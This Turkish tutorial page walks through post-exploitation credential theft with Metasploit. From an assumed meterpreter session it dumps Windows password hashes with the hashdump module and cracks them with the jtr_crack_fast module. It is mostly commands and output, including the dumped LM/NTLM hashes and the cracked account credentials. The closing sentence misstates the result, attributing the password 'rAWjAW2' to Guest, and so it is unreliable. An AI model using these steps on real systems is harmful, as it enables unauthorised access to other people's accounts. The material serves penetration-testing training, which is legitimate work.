MSF İçinde John The Ripper

MSF İçinde John The Ripper

John the Ripper

John The Ripper programı, karmaşık algoritmalı parolaları çözmek için kullanılan bir programdır. Bir takım kelime listelerini kullanarak hash olarak kaydedilmiş kodları çözmeye çalışır.

Metasploit içerisinde de John The Ripper kullanabilirsiniz. Burada kullanılacak John the Ripper, basit algoritmalarla ilgilenir. Çok karmaşık ve ileri düzey hash kodları için Metasploit dışında çalışmanız gerektiğini belirtelim. Metasploit içindeki John the Ripper, sadece LM veya NTLM hash kodlarını çözmek için başlangıç düzeyinde işlem yapmanıza yarar. Bir örnekle görelim.

Öncelikle hedef bilgisayarda meterpreter oturum açtığımızı kabul ediyoruz. session 1 olarak aktif halde olan oturum için post/windows/gather/hashdump modülünü aktif hale getirip hash bilgilerini alalım.

msf auxiliary***(*** handler***)***  ***>***  use post/windows/gather/hashdump
msf post***(*** hashdump***)***  ***>***  set session 1
session ***=>***  1
 
msf post***(*** hashdump***)***  ***>***  run

***[*** ******* ***]***  Obtaining the boot key...
***[*** ******* ***]***  Calculating the hboot key using SYSKEY bffad2dcc991597aaa19f90e8bc4ee00...
***[*** ******* ***]***  Obtaining the user list and keys...
***[*** ******* ***]***  Decrypting user keys...
***[*** ******* ***]***  Dumping password hashes...


Administrator:500:cb5f77772e5178b77b9fbd79429286db:b78fe104983b5c754a27c1784544fda7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:810185b1c0dd86dd756d138f54162df8:7b8f23708aec7107bfdf0925dbb2fed7:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8be4bbf2ad7bd7cec4e1cdddcd4b052e:::
rAWjAW:1003:aad3b435b51404eeaad3b435b51404ee:117a2f6059824c686e7a16a137768a20:::
rAWjAW2:1004:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::


***[*** ******* ***]***  Post module execution completed

Hash bilgilerini ekranda görebilirsiniz. Şimdi auxiliary/analyze/jtr_crack_fast modülünü kullanalım.

msf post***(*** hashdump***)***  ***>***  use auxiliary/analyze/jtr_crack_fast
msf auxiliary***(*** jtr_crack_fast***)***  ***>***  run

***[*** ******* ***]***  Seeded the password database with 8 words...

guesses: 3  time: 0:00:00:04 DONE ***(*** Sat Jul 16 19:59:04 2011***)***   c/s: 12951K  trying: WIZ1900 - ZZZ1900
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
***[*** ******* ***]***  Output: Loaded 7 password hashes with no different salts ***(*** LM DES ***[*** 128/128 BS SSE2]***)*** 
***[*** ******* ***]***  Output: D                ***(*** cred_6:2***)*** 
***[*** ******* ***]***  Output: PASSWOR          ***(*** cred_6:1***)*** 
***[*** ******* ***]***  Output: GG               ***(*** cred_1:2***)*** 
Warning: mixed-case charset, but the current hash type is ***case*** -insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 1  time: 0:00:00:05 DONE ***(*** Sat Jul 16 19:59:10 2011)  c/s: 44256K  trying: ***||*** V***}***  - ***||*** |***}*** 
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
***[*** ******* ***]***  Output: Loaded 7 password hashes with no different salts ***(*** LM DES ***[*** 128/128 BS SSE2]***)*** 
***[*** ******* ***]***  Output: Remaining 4 password hashes with no different salts
***[*** ******* ***]***  Output: ***(*** cred_2***)*** 
guesses: 0  time: 0:00:00:00 DONE ***(*** Sat Jul 16 19:59:10 2011***)***   c/s: 6666K  trying: 89093 - 89092
***[*** ******* ***]***  Output: Loaded 7 password hashes with no different salts ***(*** LM DES ***[*** 128/128 BS SSE2]***)*** 
***[*** ******* ***]***  Output: Remaining 3 password hashes with no different salts
guesses: 1  time: 0:00:00:11 DONE ***(*** Sat Jul 16 19:59:21 2011***)***   c/s: 29609K  trying: zwingli1900 - password1900
Use the "--show" option to display all of the cracked passwords reliably
***[*** ******* ***]***  Output: Loaded 6 password hashes with no different salts ***(*** NT MD4 ***[*** 128/128 SSE2 + 32/32]***)*** 
***[*** ******* ***]***  Output: password         ***(*** cred_6***)*** 
guesses: 1  time: 0:00:00:05 DONE ***(*** Sat Jul 16 19:59:27 2011***)***   c/s: 64816K  trying: ***||*** |***}*** 
Use the "--show" option to display all of the cracked passwords reliably
***[*** ******* ***]***  Output: Loaded 6 password hashes with no different salts ***(*** NT MD4 ***[*** 128/128 SSE2 + 32/32]***)*** 
***[*** ******* ***]***  Output: Remaining 5 password hashes with no different salts
***[*** ******* ***]***  Output: ***(*** cred_2***)*** 
guesses: 0  time: 0:00:00:00 DONE ***(*** Sat Jul 16 19:59:27 2011***)***   c/s: 7407K  trying: 89030 - 89092
***[*** ******* ***]***  Output: Loaded 6 password hashes with no different salts ***(*** NT MD4 ***[*** 128/128 SSE2 + 32/32]***)*** 
***[*** ******* ***]***  Output: Remaining 4 password hashes with no different salts

***[*** +] Cracked: Guest: ***(*** 192.168.184.134:445***)*** 
***[*** +] Cracked: rAWjAW2:password ***(*** 192.168.184.134:445***)*** 
***[*** ******* ***]***  Auxiliary module execution completed
msf auxiliary***(*** jtr_crack_fast***)***  ***>*** 

Görüldüğü gibi 192.168.184.134 IP adresinde Guest kullanıcısı için parola rAWjAW2 olarak bulundu.

Last updated on